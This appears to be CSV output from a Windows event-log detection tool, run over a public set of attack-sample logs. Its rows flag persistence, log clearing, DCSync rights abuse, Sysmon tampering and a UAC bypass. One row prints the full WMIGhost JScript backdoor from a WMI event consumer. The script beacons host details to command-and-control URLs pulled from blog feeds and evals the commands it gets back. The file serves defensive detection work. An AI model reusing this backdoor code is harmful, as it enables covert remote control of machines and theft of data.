2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x17dad | PID: 3520 | PGUID: 365ABB72-7933-5C91-0000-00103CDB0600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3836 | PGUID: 365ABB72-795D-5C91-0000-00105C070700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2004 | PGUID: 365ABB72-798B-5C91-0000-0010C8550A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 3428 | PGUID: 365ABB72-79FC-5C91-0000-0010DBC60A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:24:08.294 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,Evas,System Log File Cleared,User: user01,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx
2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx
2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx
2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\user01\Desktop\WMIGhost.exe"" | Process: C:\Users\user01\Desktop\WMIGhost.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xaaf2b | PID: 3328 | PGUID: 365ABB72-F76A-5CA4-0000-0010FA0D1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,info,,WMI Event Consumer Activity,"Modified | Type: Script | Name: ""ProbeScriptFint"" | Dst: ""var sXmlUrl=\""http://kumardeep.sosblogs.com/The-first-blog-b1/RSS-b1-rss2-posts.htm;http://blogs.rediff.com/anilchopra/feed/;http://www.blogster.com/kapoorsunil09/profile/rss\"";var sOwner='XDD';var MAIN=function(){$=this;$.key='W';$.sFeedUrl=sXmlUrl;$.sOwner=sOwner;$.sXmlUrl='';$.oHttp=null;$.oShell=null;$.oStream=null;$.sHostName=null;$.sOSType=null;$.sMacAddress=null;$.sURLParam=null;$.version='2.0.0';$.runtime=5000;$.oWMI=null;$._x=ActiveXObject;};MAIN.prototype={InitObjects:function(){$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2');$.oShell=new $._x('WScript.Shell');$.oStream=new $._x('ADODB.Stream');$.GetOSInfo();$.GetMacAddress();$.GenerateUrlParam();},WMI:function(sql){return $.oWMI.ExecQuery(sql);},GetOSInfo:function(){var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));if(!e.atEnd()){var item=e.item();$.sOSType=item.Caption+item.ServicePackMajorVersion;$.sHostName=item.CSName;}},GetMacAddress:function(){var e=new Enumerator($.WMI('Select * from Win32_NetworkAdapter where PNPDeviceID like \\\""%PCI%\\\"" and NetConnectionStatus=2'));if(!e.atEnd()){$.sMacAddress=e.item().MACAddress;}},GenerateUrlParam:function(){var time=new Date();$.sURLParam='cstype=server&authname=servername&authpass=serverpass&hostname='+$.sHostName+'&ostype='+$.sOSType+'&macaddr='+$.sMacAddress+'&owner='+$.sOwner+'&version='+$.version+'&runtime='+$.runtime;$.sURLParam+='&t='+time.getMinutes()+time.getSeconds();},CleanObjects:function(){$.oShell=null;$.oStream=null;var e=new Enumerator($.WMI('Select * from Win32_Process where Name=\\\""scrcons.exe\\\""'));while(!e.atEnd()){e.item().terminate();e.moveNext();}},Decode:function(sourceStr){var keycode=sourceStr.charCodeAt(0);var source=sourceStr.substr(1);var vals=source.split(',');var result='';for(var i=0;i<vals.length;i++){result+=String.fromCharCode(vals[i]^keycode);}return result;},circleDecode:function(sc){var base=sc.charCodeAt(0);var s=base-32;var r='';for(var i=1;i<sc.length;i++){var nc=sc.charCodeAt(i)-s-i+1;if(nc<32){nc=126+(nc-32)%94;}r+=String.fromCharCode(nc);}return r;},MainLoop:function(){$.oHttp=new $._x('Microsoft.XmlHttp');var feedUrlArry=$.sFeedUrl.split(';');var start=new Date();var oXml=new ActiveXObject('MSXML2.DOMDocument.3.0');for(var n=0;n<feedUrlArry.length;n++){var UrlList=new Array();var URLnum=0;try{var tstr=feedUrlArry[n].match('http://.*?\\\\.php');if(tstr!=null){UrlList[URLnum++]=tstr;}else{$.oHttp.Open('GET',feedUrlArry[n],false);$.oHttp.setRequestHeader('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9.1) Gecko/20090624 Firefox/3.5');$.oHttp.Send();var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g,'');var re=/<title>@(.*)@<\\/title>+/g;var titleList=response.match(re);for(var i=0;i<titleList.length;i++){try{oXml.loadXML(titleList[i]);var container=oXml.getElementsByTagName('title');var tmpstr=container[0].text.match('@(.*)@');UrlList[URLnum++]=$.circleDecode(tmpstr[1]);}catch(e){}}}for(var Urlindex=0;Urlindex<UrlList.length;Urlindex++){$.sXmlUrl=UrlList[Urlindex];var runnum=360;while(runnum-->0){$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam);var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g,'');if(response.length>0){var commands=null;var container;try{oXml.loadXML(response);container=oXml.getElementsByTagName('div');for(var i=0;i<container.length;i++){if(container[i].getAttribute('id')=='0a552b5a4352'){commands=eval('('+container[i].text+')').command;}}}catch(e){}if(commands!=null){var commandresult='';for(var i=0;i<commands.length;i++){var result='no response';try{result=eval($.Decode(commands[i].value));}catch(e){}if(i>0){commandresult+=',';}commandresult+='\\''+commands[i].id+'\\':\\''+escape(result)+'\\'';}if(commandresult.length>0){commandresult='{'+commandresult+'}';$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam+'&command=result&commandresult='+commandresult);}}else{$.sXmlUrl='';runnum=0;}}$.runtime=(new Date()).getTime()-start.getTime();WScript.Sleep(10000);}if($.sXmlUrl.length>0){return;}}}catch(e){}}},Fire:function(){$.InitObjects();try{$.MainLoop();}catch(e){}$.CleanObjects();}};new MAIN().Fire();"" | User: PC04\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Exec,Suspicious Scripting in a WMI Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
2019-04-04 03:11:54.198 +09:00,PC04.example.corp,21,info,,WMI Event Consumer To Filter Activity,"Modified | Consumer: ""\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\""ProbeScriptFint\"""" | Filter: ""\\\\.\\root\\subscription:__EventFilter.Name=\""ProbeScriptFint\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\scrcons.exe -Embedding | Process: C:\Windows\System32\wbem\scrcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2636 | PGUID: 365ABB72-F76F-5CA4-0000-0010AA201700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,Persis | PrivEsc,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
2019-04-19 01:55:37.014 +09:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:55:37.014 +09:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\Sysmon.exe -i,rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:55:37.115 +09:00,IEWIN7,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 4.20,rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:55:37.125 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:55:37.125 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 3232 | PGUID: 365ABB72-AC09-5CB8-0000-0010999C0700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:55:38.076 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 2000 | PGUID: 365ABB72-AC06-5CB8-0000-001059830700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:55:44.045 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:55:44.045 +09:00,IEWIN7,1,info,,Process Created,"Cmd: sysmon -c sysmonconfig-18-apr-2019.xml | Process: C:\Users\IEUser\Desktop\Sysmon.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 3252 | PGUID: 365ABB72-AC10-5CB8-0000-001047A40700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:55:44.135 +09:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:55:44.135 +09:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\sysmonconfig-18-apr-2019.xml,rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:55:44.145 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 3252 | PGUID: 365ABB72-AC10-5CB8-0000-001047A40700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:55:51.285 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: Powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3576 | PGUID: 365ABB72-AC38-5CB8-0000-0010365E0800 | Hash: SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0xca21 | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800 | Hash: SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:57:06.954 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,undefined | Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 912 | PGUID: 365ABB72-AB26-5CB8-0000-0010D1AE0000,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:57:52.910 +09:00,IEWIN7,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1031,technique_name=Modify Existing Service | tcp | Src: fe80:0:0:0:80ac:4126:fa58:1b81:49158 (IEWIN7) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:135 (IEWIN7) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800",rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
